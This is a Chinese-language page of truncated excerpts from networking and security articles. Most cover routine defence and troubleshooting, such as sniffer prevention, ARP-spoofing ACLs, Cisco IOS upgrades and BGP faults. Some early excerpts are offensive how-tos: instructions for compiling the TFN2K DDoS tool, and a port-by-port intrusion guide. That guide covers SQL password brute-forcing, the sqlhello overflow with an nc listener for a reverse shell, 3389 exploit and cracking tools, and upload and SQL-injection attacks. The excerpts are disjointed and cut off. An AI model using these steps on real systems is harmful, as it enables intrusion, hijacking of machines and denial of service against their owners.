1.Synflood：该攻击以多个随机的源主机地址向目的主机发送SYN包，而在收到目的主机的SYN ACK后并不回应，这样，目的主机就为这些源主机建立了大量的连接队列，而且由于没有收到ACK一直维护着这些队列，造成了资源的大量消耗而不能向正常请求提供服务。2.Smurf：该攻击向一个子网的广播地址发一个带有特定请求（如ICMP回应请求）的包，并且将源地址伪装成想要攻击的主机地址。子网上所有主机都回应广播包请求而向被攻击主机发包，使该主机受到攻击。3.Land-based：攻击者将一个包的源地址和目的地址都设置为目标主机的地址，然后将该包通过IP欺骗的方式发送给被攻击主机，这种包可以造成被攻击主机因试图与自己建立连接而陷入...

首先说我们用来攻击的客户机和服务器的配置方法，使用当下最有名的REDHAT LINUX进行测试，本次攻击测试我使用的是FEDORA CORE3 ，软件用的是最有名的DDOS。废话不说了,开始设置服务器。解压 tar -zxvf tfn2k.tgz一.安装TFN2KTFN2K为开放原代码的软件，所以需要我们进行编译，这个不用说了，编译应该都会的吧，但有几个地方是必需注意的，因为使用不同版本和厂商的LINUX需要不同的设置。先修改src/ip.h注释掉以下部分，否则编译出错。 /*struct in_addr　{unsigned long int s_addr;};*/然后make进行编译编译时会提示你输入服务器端进行密码设置8-32位，(攻击的时候需要输入密码)编译后会出现两个新的执行文...

肉鸡是什么意思？肉鸡，一种植入性的电脑木马，所谓电脑肉鸡，就是拥有管理权限的远程电脑。也就是受别人控制的远程电脑3389是什么意思？3389又称Terminal Service，服务终端。在WindowsNT中最先开始使用的一种终端，在Win2K的Professional版本中不可以安装，在Server或以上版本才可以安装这个服务，其服务端口为3389。由于使用简单，方便等特点，一直受系统管理员的青昧。也正式因为他的简便，不产生交互式登陆，可以在后台操作，因此也受到了黑客朋友的喜爱，事实可以说明，现在大多数朋友在入侵之后，都想打开windows终端服务，甚至不惜重启对方的计算机，也要把终端服务安装上，由此可见他的普遍性。另，在在XP系统中又叫做&ldquo...

1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后 SQLTools.exe入侵对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的，测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe，扫描空口令的机器 3. 3899的入侵 对很早的机器，可以试试3389的溢出(win3389ex.exe) 对2000的机器，可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器，可以用webdav入侵; 对bbs论坛，可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。(啊D的注入软件...

网络嗅探确实是难于检测的，但它确实是可以预防的，下面就介绍一些网络嗅探的预防方法。网络管理人员常用的方法有：主动集线器、加密、Kerberos、一次性口令技术、混杂模式网络接口设备等。下面将就这些方法分别展开论述。1.主动集线器集线器是连接网络较常用的设备。通常的集线器是采用广播的方式进行数据传输的，而主动式集线器只向目标地址主机发送数据包，这就使混杂模式Sniffer失效。它仅适用于10Base-T以太网（注：这种类型现在已在计算机市场消失）。 只有两家厂商曾生产过主动式集线器：3Com和HP。随着交换机的成本和价格的大幅度降低，交换机已成为非常有效的使Sniffer失效的设备。目前最常见的交换机在第三层（网络层）根据数据...

最近尝试用Windows 2003单网卡用花生壳实现VPN，搭建好VPN服务器后，注册好花生壳，就报错了！错误信息：TCP/IP CP报告了错误733，不能完成到远程计算机的连接，没有就ppp协议成功。查看了下资料发现是VPN服务器不能设成自动分配IP地址，要取消DHCP自动分配。然后在“路由和远程访问”中的本地服务器上单击右键，“属性”“IP”在IP地址指派处选择“静态地址池”。自行输入地址即可。地址因没有被占用。在CMD中ping同C段IP无法ping通的基本可用。设置好之后，继教尝试连接，问题又出现了，出现“一个或多个网络协议没有连接成功，TCP/IP已被成功连接，IPX...

在局域网中访问共享资源是十分常见的事情，在不知道共享资源准确路径的情况下，绝大多数人都是通过工作站系统桌面中的“网上邻居”，来寻找共享资源并进行访问操作的，可以说系统桌面中的“网上邻居”图标就是共享资源的访问“入口”，一些别有用心的人通过这一“入口”，可能会轻而易举地捕捉到局域网中的一些隐私信息。为了保护局域网隐私，我们有时需要将“网上邻居”这一共享资源访问“入口”隐藏起来，下面就是一些具体的隐藏方法，希望能对有这方面需求的朋友带来帮助! 　　从DCOM权限出发 　　在那些安装了Windows 2000系统的工作站中，有一种比较特殊的方法可以轻松将...

平时在使用迅雷的时候，有可能会出现一些问题，甚至会影响到网络使用。比如有可能会出现QQ掉线、网页无法打开或打开缓慢、网络延迟增加等等问题，这类问题表象简单，实则原因错综复杂。在定位这类问题的过程中，感觉就像探索一座孤岛，遇到各种奇怪的环境。不过，只要静下心来思考，往往能够很容易找到解决的办法。 一、DNS限制查询频率 问题现象：使用迅雷下载时无法打开网页，进行其他需要进行域名解析的操作失败。 问题排除：这个案例较为常见的，我们首次发现此问题是在一所学校的网络中，该用户描述使用迅雷进行下载时，无法打开网页，最初我们以为是下载过程中连接数过多导致的网络设备性能问题。但在问题定位过程中发现，在无法打开网...

交换机使用时出现故障是难免的，但是交换机在出项故障时如何处理，能否尽快排查故障问题很是让人头疼的。作为敬职敬业的维护人员，必须对交换机故障类型以及故障分析与处理熟悉与心。然而对初学者而言，交换机常出现的故障类型及分析处理的方法就没有那么好掌握了！本文特别为交换机常出现的故障类型及分析处理的方法作一简要的介绍。1.交换机故障问题分类（1）程序BUG，软件程序设计存在着缺陷。（2）系统数据错误，系统数据，包括软件工注，用于对整个系统进行定义。如系统数据出现错误，也会造成系统全方位的故障，对整个交换局产生影响。 网管（3）电路板块类型不合适。硬件更新后，同一名称的电路板块可能有多种不同的型号。在一般情况下...

网友对语音模快的CISCO2610进行IOS升级时，由于路由器的内存（flash）为8M，IOS软件为7M多，升级后路由器无法正常启动。启动后到rommon 1 >状态。由于本人长期从事计算机网络管理工作，在对CISCO路由器的长期日常维护和管理实践中积累了一定的经验。现总结归纳出CISCO路由器IOS映像升级的几种方法，供广大网络爱好者或同仁参考。在介绍CISCO路由器语音模快升级方法前，有必要对Cisco路由器的存储器的相关知识作以简单介绍。路由器与计算机相似，它也有内存和操作系统。在Cisco路由器中，其操作系统叫做互连网操作系统（Internetwork Operating System），常简称为IOS.路由器的存储器主要有：ROM：只...

随着信息产业的飞速发展，计算机网络技术得到广泛应用，计算机网络已成为现代工作生活中必不可少的一部分。路由器作为计算机网的核心设备，相应地在网络上存在广泛的应用。高端路由器现已由企业级设备成为公众网上重要的电信级设备。随着互联网络的逐步普及以及它在生活中重要性的增加，路由器的性能、功能、安全性、可靠性等指标变得越来越重要。所以对路由器的测试有其重要性与必要性。路由器测试规范主要有下面通信行业标准来规范：YD/T1156-2001《路由器测试规范－高端路由器》；YD/T1098-2001《路由器测试规范－低端路由器》。以上标准分别参照下面标准制定：YD/T1097-2001《路由器设备技术规范－高端路由器》；YD/T1096-2001《...

二层交换机实现仿冒网关的ARP防攻击：一、组网需求：1. 二层交换机阻止网络用户仿冒网关IP的ARP攻击二、组网图：图1 二层交换机防ARP攻击组网S3552P是三层设备，其中IP：100.1.1.1是所有PC的网关，S3552P上的网关MAC地址为000f-e200-3999。PC-B上装有ARP攻击软件。现在需要对S3026C_A进行一些特殊配置，目的是过滤掉仿冒网关IP的ARP报文。三、配置步骤对于二层交换机如S3026C等支持用户自定义ACL（number为5000到5999）的交换机，可以配置ACL来进行ARP报文过滤。全局配置ACL禁止所有Sender ip address字段是网关IP地址的ARP报文acl num 5000rule 0 deny 0806 ffff 24 64010101 ffffffff...

一、故障处理流程图1 BGP无法收到路由信息故障处理流程二、故障处理步骤1）步骤1使用display bgp routing-table命令查看是否收到对端的路由信息<S9500>display bgp routing-tableFlags: # - valid ^ - active I - internalD - damped H - history S - aggregate suppressed B - balanceDest/Mask Next-Hop Med Local-pref Origin Path--------------------------------------------------------------------------#^ 20.20.20.0/24 0.0.0.0 0 INC#^ 44.44.44.0/24 0.0.0.0 0 INCRoutes total: 22）步骤2使用display bgp peer命令查看BGP邻居是否已经建立。如果确定BGP邻居建立，请转步骤3。3）步骤3检查对端...

一、故障处理流程图1 BGP收到的路由信息无法生效故障处理流程二、故障处理步骤1）步骤1检查邻居的地址和本路由器是否在同一网段，是否由于路由迭代原因导致路由无法生效。如果确定不是路由迭代原因导致，请转步骤2。2）步骤2查看路由表中是否存在其他路由和BGP路由相同，在路由的优先级中，BGP的优先级最低，如果有其他路由存在，BGP路由不会生效。如果确定没有其他路由，请转步骤3。3）步骤3上述步骤无法定位问题，请联系H3C 800进一步处理。

一、故障处理流程图1 BGP路由无法发布故障处理流程二、故障处理步骤1）步骤1使用display bgp peer命令查看BGP邻居是否已经建立。邻居没有建立，请参见前面章节进行定位。邻居已经建立，请转步骤2。<S9500>display bgp peerPeer AS-num Ver Queued-Tx Msg-Rx Msg-Tx Up/Down State--------------------------------------------------------------------------------3.3.3.2 1 4 0 106 107 01:43:37 Established2）步骤2使用display ip route 命令查看需要发布的路由是否存在。如果路由不存在，请确定网络相关配置和拓扑信息。如果路由存在，请转步骤3。3）步骤3查看BGP的配置是否引入这些路由到BGP中。确认路由...

一、故障处理流程图1 BGP邻居无法建立故障处理流程二、故障处理步骤1）步骤1检查是否能够ping通对端邻居地址，如果无法ping通对端地址，需要检查端口相关配置等信息，具体定位步骤可以参见前面章节。如果确定对端能够ping通，请转步骤2。2）步骤2检查两端BGP配置信息，重点关注邻居、对等体组、AS号、IP地址等配置。检查是否配置影响BGP报文收发的ACL过滤规则（BGP协议采用TCP连接，TCP目的端口号是179）。如果BGP基本配置信息正确，请转步骤3。<S9500>display current-configuration configuration bgp#bgp 1network 3.3.3.0 255.255.255.0import-route directgroup why internalpeer 3.3.3.2 group why#ret...